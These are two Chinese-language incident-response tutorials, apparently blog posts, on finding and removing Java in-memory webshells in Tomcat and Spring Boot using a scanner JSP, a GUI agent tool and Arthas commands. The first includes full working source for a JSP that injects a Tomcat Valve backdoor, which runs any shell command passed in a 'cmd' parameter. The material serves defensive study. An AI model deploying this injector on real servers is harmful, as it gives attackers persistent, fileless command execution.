应急响应-Spring框架内存马查杀与其他补充内存马 Tomcat-Valve内存马哥斯拉不支持该类型内存马植入，只能用脚本方式植入<%@ page import="java.lang.reflect.Field" %> <%@ page import="org.apache.catalina.connector.Request" %> <%@ page import="org.apache.catalina.valves.ValveBase" %> <%@ page import="org.apache.catalina.connector.Response" %> <%@ page import="java.io.IOException" %> <%@ page import="org.apache.catalina.core.*" %> <%@ page import="java.io.InputStream" %> <%@ page import="java.util.Scanner" %> <%@ page contentType="text/html;charset=UTF-8" language="java" %> <% Field requestField = request.getClass().getDeclaredField("request"); requestField.setAccessible(true); final Request request1 = (Request) requestField.get(request); StandardContext standardContext = (StandardContext) request1.getContext(); Field pipelineField = ContainerBase.class.getDeclaredField("pipeline"); pipelineField.setAccessible(true); StandardPipeline standardPipeline1 = (StandardPipeline) pipelineField.get(standardContext); ValveBase valveBase = new ValveBase() { @Override public void invoke(Request request, Response response) throws ServletException,IOException { if (request.getParameter("cmd") != null) { boolean isLinux = true; String osTyp = System.getProperty("os.name"); if (osTyp != null && osTyp.toLowerCase().contains("win")) { isLinux = false; } String[] cmds = isLinux ? new String[]{"sh", "-c", request.getParameter("cmd")} : new String[]{"cmd.exe", "/c", request.getParameter("cmd")}; InputStream in = Runtime.getRuntime().exec(cmds).getInputStream(); Scanner s = new Scanner(in).useDelimiter("\\A"); String output = s.hasNext() ? s.next() : ""; response.getWriter().write(output); response.getWriter().flush(); this.getNext().invoke(request, response); } } }; standardPipeline1.addValve(valveBase); out.println("evil valve inject done!"); %>尝试通过scanner脚本查杀，发现脚本已经无法正常打开了通过GUI工具进行查杀分析成功找到对应的Valve内存马，可进行查杀通过Arthas工具进行分析sc * | grep valve jad --source-only org.apache.jsp.valve_jsp总结无法通过scanner脚本进行分析，有别于传统的内存马查杀方式，传统内存马这三种都可以，但是遇到这种类型就没法通过scanner脚本查杀，得通过GUI工具或者Arthas进行分析定性。Spring框架内存马Spring Controller型内存马：动态注册Controller及映射路由。Spring Interceptor型内存马：动态注册Interceptor及映射路由。Spring Webflux型内存马：动态注册WebFilter及映射路由。遇到框架型的内存马，我们就没法通过scanner脚本，GUI工具来进行查杀了，我们只能通过Arthas工具进行分析。因为这些SpringBoot框架启动基本都是jar包启动，不放在Tomcat下，我们的scanner脚本基本派不上用场。Controller型&Interceptor型内存马通过Arthas排查sc * | grep Controllerjad --source-only com.example.springinject.demos.web.myInjectController3sc * | grep InterceptorWebflux型内存马先行在靶场植入内存马，尝试通过哥斯拉进行连接通过Arthas排查sc * | grep Webflux在这种情况出现的时候，我们就得换一种方式了，通过内存马的常见关键字进行筛查：memshellshellosruntime.......jad --source-only com.example.webfluxmem.WebFluxFilterMemshell这种也是没办法的办法，如果攻击者换一种的话基本就查不出来了，所以说内存马的查杀还是很有门道的，目前针对这种情况我没有很好的解决方案，要是有其他方法可以告知我。如何清除内存马上面我们在内存中分析定性了内存马是哪些类文件，而这些类文件又不像Tomcat有文件目录，他们都在jar包中，我们要怎么进行清除呢？首先要先停止jar包的运行，然后通过压缩软件打开jar包删除恶意类重新启动之后就不存在内存马了蓝队排查思路总结此类方法纯属个人了解，如有遗漏请大家多多指正先进行资产的梳理，确认采用的组织架构，如：中间件（Tomcat）、开发框架（SpringBoot）等对应查找可能存在的内存马技术，如：Tomcat-Valve、Spring Controller型、传统内存马基于上述信息，我们可以确定我们要采用的分析工具，如：传统则都可用、Spring只能用Arthas等确认采用的分析工具之后进行分析定性，如：Arthas通过命令查找对应的后缀，jad查看反编译源码，dump文件分析定性等定性之后，通过脚本或者其他工具、手工进行内存马的清除最后重启服务观察内存马是否仍然存在待补充Tomcat其他类型（如Upgrade、Executor、Poller）的内存马：这些内存马会动态替换或添加全局组件。其他中间件（如Grizzly）的内存马：动态注册Filter及映射路由。其他内存马（特殊情况下才能实现植入）：WebSocket型内存马：动态注册WebSocket路由及处理逻辑。Tomcat JSP型内存马：动态注册Tomcat JSP管理逻辑并实现驻留。线程型内存马：启动一个无法被杀死的线程。RMI型内存马：动态启动一个RMI Registry。Agent型内存马：通过Hook并修改关键方法添加恶意逻辑。Agent型内存马在现代webshell管理工具中有广泛实现。

应急响应-传统Web内存马查杀 内存马是什么在Web安全领域，Webshell一直是一个非常重要且热门的话题。在目前传统安全领域，Webshell根据功能的不同分为三种类型，分别是：一句话木马，小马，大马。而根据现在防火墙技术的更新迭代，随后出现了加密的木马技术，比如：加密一句话。而我们今天要说的是一种新的无文件的Webshell类型：内存马。发展由来由于近几年防火墙，IDS，IPS，流量分析等各种安全设备的普及和更新，这种传统连接方式非常容易被设备捕获拦截，而且由于文件是明文存放在服务器端，所以又很容易被杀毒软件所查杀。在今天看来这种传统连接方式显然已经过时，于是乎，进化了一系列的加密一句话木马，但是这种方式还是不能绕过有类似文件监控的杀毒软件，于是乎进化了新一代的Webshell ---> 内存马内存马原理内存马是无文件Webshell，什么是无文件webshell呢？简单来说，就是服务器上不会存在需要链接的webshell脚本文件。这种方式为什么能链接呢？内存马的原理就像是MVC架构，即通过路由访问控制器内存马的原理就是在web组件或者应用程序中，注册一层访问路由，访问者通过这层路由，来执行我们控制器中的代码内存马类型PHPJavaPythonASPX传统Java内存马查杀在内存马的家族中，Java内存马是目前涉及面最广技巧最多，方式最多的，所以我们这篇着重讲一下Java内存马在Tomcat中间件中的查杀，像是Spring框架有着跟Tomcat不一样的内存马，所以我们分开讲。哥斯拉注入内存马首先启动一个Tomcat环境，然后让哥斯拉来注入内存马内存注入之后是不存在文件的，仅有一个路由，它是无文件落地的。那么怎么查杀内存马呢？这时候我们可以利用一些别人写好的脚本来进行查杀https://github.com/c0ny1/java-memshell-scanner/tree/master将对应的scanner.jsp放到网站目录下，进行访问可以看到当我们注入内存马之后，这边是检测到了没有对应的文件，我们去目录看下同样也是没有对应的文件存在的，直接通过哥斯拉连接内存马通过脚本清除内存马脚本提示我们这个路由可能是内存马，通过脚本kill这两个路由可以看到哥斯拉无法连接了通过Java诊断利器 Arthas 分析定性内存马GitHub - alibaba/arthas: Alibaba Java Diagnostic Tool Arthas/Alibaba Java诊断利器ArthasArthas 为一款监控诊断产品，通过全局视角实时查看应用load、内存、gc、线程的状态信息。可使用该工具对内存马排查和分析，如攻击者隐藏的深的话，可将所有的类都反编译导出来然后逐一排查。java -jar arthas-boot.jar可以看到一个是哥斯拉的进程，另一个就是Tomcat中间件在运行，我们当然选择分析Tomcat了查看URL路由mbean | grep "name=/"sc查看JVM 已加载的类信息sc *.Filtersc *.Servlet那这么多类我们要怎么分析出哪一个是内存马呢？通过对这些类的搜索，可以初步判断哪些可信，哪些不可信那么我们如何进一步定性这个类是内存马呢？dump类反编译定性内存马dump org.apache.coyote.ext.Java7Support这时候就得通过dump文件来进行分析了，dump出来的是class文件，我们通过IDEA打开即可获取到反编译版本的代码，这时候如果你的代码功底比较扎实的话，你就可以进行审计判断。那可能你的代码功底不是很扎实该咋办？保存代码为.java文件上传微步即可补充：jad在线反编译类jad --source-only org.apache.coyote.ext.Java7Support补充：通过web日志进行分析查看中间件的日志，如果存在请求那种没有具体文件的路由，但是返回值或者返回长度过长的请求包，那么就有可能是注入内存马的路由使用脚本或者工具清除内存马使用我们前面提到的scanner.jsp脚本清除内存马或者这个综合工具进行清除GitHub - 4ra1n/shell-analyzer: 通过 JAVA AGENT 查杀内存马，提供简易方便的 GUI 界面，一键反编译目标环境内存马进行分析，支持远程查杀和本地查杀（注意：仅供本地复现分析学习，请勿用于正式和生产环境）通过选中双击即可反编译Listener内存马Listener内存马无法通过哥斯拉直接植入，因为哥斯拉不支持这种类型的内存马植入，所以我们得通过其他方式来植入Listener内存马。遇到这种内存马通过上面的scanner.jsp脚本可以进行清除，同时通过GUI图形化界面也可以进行清除还有我们的内存分析工具Arthas也可以进行定性sc * | grep Listenerjad --source-only ch.qos.logback.ServletRequestWhnListener